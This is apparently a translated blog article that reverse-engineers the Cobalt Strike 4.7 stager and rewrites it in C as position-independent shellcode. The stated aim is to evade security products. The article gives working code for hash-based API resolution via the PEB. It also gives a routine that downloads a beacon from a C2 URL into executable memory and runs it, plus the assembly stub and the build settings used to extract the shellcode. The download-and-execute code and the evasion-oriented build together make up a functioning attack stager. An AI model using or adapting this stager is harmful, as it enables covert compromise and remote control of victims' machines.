CS 4.7 Stager Reversing and Shellcode Rewrite

2023-2-21 11:54:0 Author: xz.aliyun.com

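1. Overview

I have long wanted a C2 framework of my own, but my skills are not there yet. CS (Cobalt Strike) is still the most usable C2 on the market, but security vendors watch it closely, and wrapping it in a loader only goes so far for evasion. I later saw that someone had rewritten the CS beacon in Go, which struck me as a good approach, but Go binaries bring problems of their own and are restrictive to load. So I wondered whether the same could be done in C. The beacon has a lot of functionality and rewriting it in a short time would be hard, so I decided to start by rewriting the CS stager in a form that can be converted to shellcode and run through a loader. CS 4.7 has been out for a while; this article reverse-engineers the CS stager and attempts to rewrite the stager shellcode in C.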

2. Sample information

Sample name: artifact.exe (a 64-bit exe generated with the CS Windows Stager Payload)

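3. Reversing the Stager

The exe-format stager that CS generates is essentially a shellcode loader. The part that actually does the stager's job of pulling down the beacon is the shellcode inside it. Because a loader can be implemented in many ways, and because the stager loading flow in 4.7 has not changed much, the loading part is analyzed only briefly.

3.1 Shellcode loading: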

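From the main function, go straight into sub_4017F8 to see what it does:

Inside sub_4017F8, the code first obtains a system timestamp, then creates a thread and reads the shellcode through a pipe before executing it:

The assembled pipe name is \\.\pipe\MSSE-3410-server: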
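Because the pipe name follows a fixed pattern with a number in the middle, it is easy to reproduce and to match when reviewing logs. The sketch below is only an illustration in portable C: `format_pipe_name` and `looks_like_msse_pipe` are names I made up, and how the loader derives the number from its timestamp is not shown in this article, so the number is simply passed in as a parameter.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Build a name of the form \\.\pipe\MSSE-<n>-server.
 * `n` stands in for the number the loader derives from its timestamp;
 * the derivation itself is not covered here (assumption: it is a plain
 * decimal integer, as in the observed name MSSE-3410-server). */
int format_pipe_name(char *out, size_t out_len, unsigned n)
{
    assert(out != NULL && out_len > 0);
    return snprintf(out, out_len, "\\\\.\\pipe\\MSSE-%u-server", n);
}

/* Return 1 if `name` matches \\.\pipe\MSSE-<digits>-server, else 0. */
int looks_like_msse_pipe(const char *name)
{
    static const char prefix[] = "\\\\.\\pipe\\MSSE-";
    static const char suffix[] = "-server";
    const char *p;

    if (strncmp(name, prefix, sizeof prefix - 1) != 0)
        return 0;
    p = name + (sizeof prefix - 1);
    if (*p < '0' || *p > '9')
        return 0;                 /* at least one digit is required */
    while (*p >= '0' && *p <= '9')
        p++;
    return strcmp(p, suffix) == 0;
}
```

Calling `format_pipe_name(buf, sizeof buf, 3410)` reproduces the name seen in this sample, and `looks_like_msse_pipe` accepts it while rejecting names without digits.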

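Follow the thread routine passed to CreateThread:

Follow WriteShellcodeToPipe_401630, which creates the pipe and writes the shellcode to it in a loop:

The shellcode content is as follows:

Writing the shellcode:

Follow ShellcodeExec_4017A6, which receives the shellcode from the pipe, then decrypts and executes it:

Reading the shellcode from the pipe into memory:

The shellcode that was read is decrypted and executed in DecryptAndExecShellcode_401595:

The decrypted shellcode can be located through the arguments passed to CreateThread; its start address is held in the R9 register: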

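3.2 Shellcode execution:

Shellcode is position-independent code and cannot call Win32 APIs directly. The CS shellcode walks the PEB structure and each module's PE export table, and locates the modules and API functions it needs by the hash of the export name:

3.2.1 Walking the PEB to resolve Win32 APIs

Walking the PEB:

Computing the module hash:

Looking up the exported function:

The complete assembly for this part is as follows: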

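| mov rdx,qword ptr gs:[rdx+60]      | Locate the PEB
| mov rdx,qword ptr ds:[rdx+18]      | PEB->Ldr (loader data)
| mov rdx,qword ptr ds:[rdx+20]      | First entry of InMemoryOrderModuleList
| mov rsi,qword ptr ds:[rdx+50]      | rsi = pointer to the module name
| movzx rcx,word ptr ds:[rdx+4A]     | rcx = module name length in bytes (Unicode, MaximumLength)
| xor r9,r9                          | 
| xor rax,rax                        |
| lodsb                              | Read the module name one byte at a time
| cmp al,61                          | Compare with 'a' (0x61) to test the case
| jl A0037                           | Below 'a' (already uppercase): skip the conversion
| sub al,20                          | Otherwise convert lowercase to uppercase
| ror r9d,D                          | ROR13 hash step: rotate right by 13
| add r9d,eax                        | Add the byte; the running hash is kept in r9d
| loop A002D                         | Repeat for every byte
| push rdx                           |
| push r9                            | 
| mov rdx,qword ptr ds:[rdx+20]      | Module base address
| mov eax,dword ptr ds:[rdx+3C]      | e_lfanew at offset 0x3C (offset of the PE header)
| add rax,rdx                        | rax points to the PE signature
| cmp word ptr ds:[rax+18],20B       | Check whether OptionalHeader.Magic is 0x20B (PE32+)
| jne A00C7                          |
| mov eax,dword ptr ds:[rax+88]      | eax = export directory RVA
| test rax,rax                       |
| je A00C7                           |
| add rax,rdx                        | Module base + export RVA = export directory VA
| push rax                           |
| mov ecx,dword ptr ds:[rax+18]      | ecx = NumberOfNames (count of named exports)
| mov r8d,dword ptr ds:[rax+20]      | r8d = AddressOfNames RVA
| add r8,rdx                         | VA of the export name pointer array
| jrcxz A00C6                        |
| dec rcx                            |
| mov esi,dword ptr ds:[r8+rcx*4]    | Fetch export name RVAs from last to first
| add rsi,rdx                        | VA of the current export name
| xor r9,r9                          | 
| xor rax,rax                        |
| lodsb                              | Read the export name one byte at a time
| ror r9d,D                          | ROR13 hash step
| add r9d,eax                        | The running hash is kept in r9d
| cmp al,ah                          | The string ends with 0; ah is 0, so al == ah ends the loop
| jne A007D                          | Not 0: keep hashing
| add r9,qword ptr ss:[rsp+8]        | Add the module hash to the function hash
| cmp r9d,r10d                       | Compare the result with the target hash (in R10)
| jne A006E                          | No match: jump back and try the next export
| pop rax                            |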

The shellcode then keeps looping over the code above, resolving the following API functions by hash one after another:

0x0726774C => LoadLibraryA
0xA779563A => InternetOpenA
0xC69F8957 => InternetConnectA
0x3B2E55EB => HttpOpenRequestA
0x7B18062D => HttpSendRequestA
0xE553A458 => VirtualAlloc
0xE2899612 => InternetReadFile
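To check the table above, the hash from the listing can be recomputed offline. The following is a minimal sketch in portable C that mirrors the two loops: the module name is hashed as UTF-16LE bytes with uppercasing and with the terminating NUL included, the function name is hashed as ASCII including its NUL, and the two sums are added. The function names (`ror32`, `module_hash`, `function_hash`, `block_api_hash`) are mine, ASCII-only names are assumed, and the module names passed in (kernel32.dll, wininet.dll) are my assumption about where each API lives, since the listing only shows the combined value.

```c
#include <assert.h>
#include <stdint.h>

/* Rotate a 32-bit value right by `bits` (0 < bits < 32). */
uint32_t ror32(uint32_t v, unsigned bits)
{
    assert(bits > 0 && bits < 32);
    return (v >> bits) | (v << (32u - bits));
}

/* Module hash: every character contributes two bytes (low byte, then a
 * zero high byte), letters are upper-cased, and the terminating NUL is
 * hashed too because the loop count is the name's MaximumLength. */
uint32_t module_hash(const char *name)
{
    uint32_t h = 0;
    const char *p = name;
    for (;;) {
        uint8_t c = (uint8_t)*p;
        if (c >= 0x61)
            c -= 0x20;            /* same test as cmp al,61 / sub al,20 */
        h = ror32(h, 13) + c;     /* low byte of the UTF-16 code unit */
        h = ror32(h, 13);         /* high byte is 0 for ASCII names */
        if (*p == '\0')
            break;                /* the NUL itself has been hashed */
        p++;
    }
    return h;
}

/* Function hash: ASCII export name, terminating NUL included. */
uint32_t function_hash(const char *name)
{
    uint32_t h = 0;
    const char *p = name;
    do {
        h = ror32(h, 13) + (uint8_t)*p;
    } while (*p++ != '\0');
    return h;
}

/* Combined value that the shellcode compares against r10d. */
uint32_t block_api_hash(const char *module, const char *function)
{
    return module_hash(module) + function_hash(function);
}
```

With these assumptions, `block_api_hash("kernel32.dll", "LoadLibraryA")` should give 0x0726774C and `block_api_hash("wininet.dll", "InternetOpenA")` should give 0xA779563A, matching the first two rows of the table. The module name is case-insensitive because of the uppercasing step; the function name is not.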

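3.2.2 Connecting to the C2 server

Call LoadLibraryA to load wininet.dll:

Call InternetOpenA to initialize:

Call InternetConnectA to open an HTTP session with the team server:

Call HttpOpenRequestA to create the HTTP request:

Call HttpSendRequestA to send the request to the server: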

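3.2.3 Fetching the beacon and checking in

Call VirtualAlloc to allocate memory for the beacon:

Call InternetReadFile in a loop to read the beacon into the allocated memory:

Jump into the beacon's memory region:

After that, the beacon decrypts itself and runs through reflective DLL injection to check in. That is outside the scope of this article, so it is not covered here.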

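4. Rewriting the Shellcode in C

From the previous sections we now understand what the CS stager does. The shellcode part calls API functions in wininet.dll to send an HTTP request to the C2 server and establish a connection, reads the beacon remotely, allocates memory for it, and jumps to it. In C, we only need to call the same API functions to get the same behavior.

However, our goal is for the C code to be convertible into shellcode. That keeps the flexible loading that shellcode offers while letting us control the shellcode freely by writing C (assembly experts, please go easy on me). Because shellcode is position-independent code, we cannot call Windows APIs directly the way a normally compiled executable does. This is why the CS shellcode contains code that walks the PEB and the export tables to obtain the Windows API functions it needs.

With the approach clear, what remains is writing the code. The key parts are given below.

4.1 Shellcode implementation

4.1.1 Walking the PEB to resolve Win32 APIs

There are already many code samples for this part, so it can simply be taken and included: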

#include <windows.h>
#include <winternl.h>

// This compiles to a ROR instruction
// This is needed because _lrotr() is an external reference
// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
#define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))

// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
typedef struct _MY_PEB_LDR_DATA {
 ULONG Length;
 BOOL Initialized;
 PVOID SsHandle;
 LIST_ENTRY InLoadOrderModuleList;
 LIST_ENTRY InMemoryOrderModuleList;
 LIST_ENTRY InInitializationOrderModuleList;
} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;

typedef struct _MY_LDR_DATA_TABLE_ENTRY
{
 LIST_ENTRY InLoadOrderLinks;
 LIST_ENTRY InMemoryOrderLinks;
 LIST_ENTRY InInitializationOrderLinks;
 PVOID DllBase;
 PVOID EntryPoint;
 ULONG SizeOfImage;
 UNICODE_STRING FullDllName;
 UNICODE_STRING BaseDllName;
} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;

HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
{
 PPEB PebAddress;
 PMY_PEB_LDR_DATA pLdr;
 PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
 PVOID pModuleBase;
 PIMAGE_NT_HEADERS pNTHeader;
 DWORD dwExportDirRVA;
 PIMAGE_EXPORT_DIRECTORY pExportDir;
 PLIST_ENTRY pNextModule;
 DWORD dwNumFunctions;
 USHORT usOrdinalTableIndex;
 PDWORD pdwFunctionNameBase;
 PCSTR pFunctionName;
 UNICODE_STRING BaseDllName;
 DWORD dwModuleHash;
 DWORD dwFunctionHash;
 PCSTR pTempChar;
 DWORD i;

#if defined(_WIN64)
 PebAddress = (PPEB) __readgsqword( 0x60 );
#elif defined(_M_ARM)
 // I can assure you that this is not a mistake. The C compiler improperly emits the proper opcodes
 // necessary to get the PEB.Ldr address
 PebAddress = (PPEB) ( (ULONG_PTR) _MoveFromCoprocessor(15, 0, 13, 0, 2) + 0);
 __emit( 0x00006B1B );
#else
 PebAddress = (PPEB) __readfsdword( 0x30 );
#endif

 pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
 pNextModule = pLdr->InLoadOrderModuleList.Flink;
 pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;

 while (pDataTableEntry->DllBase != NULL)
 {
  dwModuleHash = 0;
  pModuleBase = pDataTableEntry->DllBase;
  BaseDllName = pDataTableEntry->BaseDllName;
  pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
  dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;

  // Get the next loaded module entry
  pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;

  // If the current module does not export any functions, move on to the next module.
  if (dwExportDirRVA == 0)
  {
   continue;
  }

  // Calculate the module hash
  for (i = 0; i < BaseDllName.MaximumLength; i++)
  {
   pTempChar = ((PCSTR) BaseDllName.Buffer + i);

   dwModuleHash = ROTR32( dwModuleHash, 13 );

   if ( *pTempChar >= 0x61 )
   {
    dwModuleHash += *pTempChar - 0x20;
   }
   else
   {
    dwModuleHash += *pTempChar;
   }
  }

  pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);

  dwNumFunctions = pExportDir->NumberOfNames;
  pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);

  for (i = 0; i < dwNumFunctions; i++)
  {
   dwFunctionHash = 0;
   pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
   pdwFunctionNameBase++;

   pTempChar = pFunctionName;

   do
   {
    dwFunctionHash = ROTR32( dwFunctionHash, 13 );
    dwFunctionHash += *pTempChar;
    pTempChar++;
   } while (*(pTempChar - 1) != 0);

   dwFunctionHash += dwModuleHash;

   if (dwFunctionHash == dwModuleFunctionHash)
   {
    usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
    return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
   }
  }
 }

 // All modules have been exhausted and the function was not found.
 return NULL;
}

With the code above included, we still need to declare the API functions we need. Here we try a different set of APIs for testing:

typedef HMODULE(WINAPI* FN_LoadLibraryA)(
    _In_ LPCSTR lpLibFileName
    );

typedef LPVOID(WINAPI* FN_VirtualAlloc)(
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
    );

typedef LPVOID(WINAPI* FN_InternetOpenA)(
    _In_ LPCSTR lpszAgent,
    _In_ DWORD dwAccessType,
    _In_ LPCSTR lpszProxy,
    _In_ LPCSTR lpszProxyBypass,
    _In_ DWORD dwFlags
    );

typedef HANDLE(WINAPI* FN_InternetOpenUrlA)(
    _In_ LPVOID hInternet,
    _In_ LPCSTR lpszUrl,
    _In_ LPCSTR lpszHeaders,
    _In_ DWORD dwHeadersLength,
    _In_ DWORD dwFlags,
    _In_ DWORD_PTR dwContext
    );

typedef BOOL(WINAPI* FN_InternetReadFile)(
    _In_ LPVOID hFile,
    _Out_ LPVOID lpBuffer,
    _In_ DWORD dwNumberOfBytesToRead,
    _Out_ LPDWORD lpdwNumberOfBytesRead
    );

typedef struct tagApiInterface {
    FN_LoadLibraryA pfnLoadLibrary;
    FN_VirtualAlloc pfnVirtualAlloc;
    FN_InternetOpenA pfnInternetOpenA;
    FN_InternetOpenUrlA pfnInternetOpenUrlA;
    FN_InternetReadFile pfnInternetReadFile;
}APIINTERFACE, * PAPIINTERFACE;

Now that we have the function types and GetProcAddressWithHash, all that is left is to look up the functions we need by hash:

#pragma warning( push )
#pragma warning( disable : 4055 )
    ai.pfnLoadLibrary = (FN_LoadLibraryA)GetProcAddressWithHash(0x0726774C);
    ai.pfnLoadLibrary(szWininet);
    ai.pfnLoadLibrary(szUser32);

    ai.pfnVirtualAlloc      = (FN_VirtualAlloc)GetProcAddressWithHash(0xE553A458);
    ai.pfnInternetOpenA     = (FN_InternetOpenA)GetProcAddressWithHash(0xA779563A);
    ai.pfnInternetOpenUrlA  = (FN_InternetOpenUrlA)GetProcAddressWithHash(0xF07A8777);
    ai.pfnInternetReadFile  = (FN_InternetReadFile)GetProcAddressWithHash(0xE2899612);
#pragma warning( pop )

4.1.2 Connecting and receiving the beacon

LPVOID hInternet = ai.pfnInternetOpenA(0, 0, NULL, 0, NULL);
HANDLE hInternetOpenUrl = ai.pfnInternetOpenUrlA(hInternet, HttpURL, NULL, 0, 0x80000000, 0);
LPVOID addr = ai.pfnVirtualAlloc(0, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

recv_tmp = 1;
recv_tot = 0;
beacon_index = addr;

while (recv_tmp > 0) {
    ai.pfnInternetReadFile(hInternetOpenUrl, beacon_index, 8192, (PDWORD)&recv_tmp);
    recv_tot += recv_tmp;
    beacon_index += recv_tmp;
}

((void(*)())addr)();

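4.1.3 Adjustments for 64-bit code

To make sure our shellcode reaches its entry point with correct stack alignment on 64-bit, we need to write an asm stub that guarantees alignment and add the object file it produces as an additional dependency for the linker: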

EXTRN ExecutePayload:PROC
PUBLIC  AlignRSP   ; Marking AlignRSP as PUBLIC allows for the function
     ; to be called as an extern in our C code.

_TEXT SEGMENT

; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
; to calling the entry point of the payload. This is necessary because 64-bit functions
; in Windows assume that they were called with 16-byte stack alignment. When amd64
; shellcode is executed, you can't be assured that you stack is 16-byte aligned. For example,
; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
; alignment.

AlignRSP PROC
 push rsi    ; Preserve RSI since we're stomping on it
 mov  rsi, rsp  ; Save the value of RSP so it can be restored
 and  rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
 sub  rsp, 020h  ; Allocate homing space for ExecutePayload
 call ExecutePayload ; Call the entry point of the payload
 mov  rsp, rsi  ; Restore the original value of RSP
 pop  rsi    ; Restore RSI
 ret      ; Return to caller
AlignRSP ENDP

_TEXT ENDS

END

We also need a header file to help us call the assembly function above:

#if defined(_WIN64)
extern VOID AlignRSP( VOID );

VOID Begin( VOID )
{
 // Call the ASM stub that will guarantee 16-byte stack alignment.
 // The stub will then call the ExecutePayload.
 AlignRSP();
}
#endif

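4.1.4 Other pitfalls

(1) String arguments must be passed in the form of character arrays;

(2) Strings must not be too long. If they are, the compiler places them in a different section and the extracted shellcode can no longer find their address;

(3) If CS uses the default profile, make sure the URL satisfies the CS check (checksum8).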

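4.2 Changing the Visual Studio configuration

Once the code is written, we still need to change some VS configuration options so that usable shellcode can be extracted from the exe we build:

Compiler: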

/GS- /TC /GL /W4 /O1 /nologo /Zl /FA /Os

Linker:

/LTCG "x64\Release\AdjustStack.obj" /ENTRY:"Begin" /OPT:REF /SAFESEH:NO

/SUBSYSTEM:CONSOLE /MAP /ORDER:@"function_link_order64.txt" /OPT:ICF /NOLOGO

/NODEFAULTLIB

Here AdjustStack.obj is the object file mentioned above, and function_link_order64.txt specifies the link order. Its content is as follows:

Begin                       // entry function
GetProcAddressWithHash
ExecutePayload  // function that implements the shellcode

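4.3 Extracting the shellcode and checking in

With the options configured, build the project to produce the exe, then extract the .text section to get our shellcode:

Testing with a simple loader, the beacon checks in successfully:

5. References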

https://bbs.kanxue.com/thread-264470.htm#msg_header_h2_0

https://web.archive.org/web/20210305190309/http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html

Source: https://xz.aliyun.com/t/12194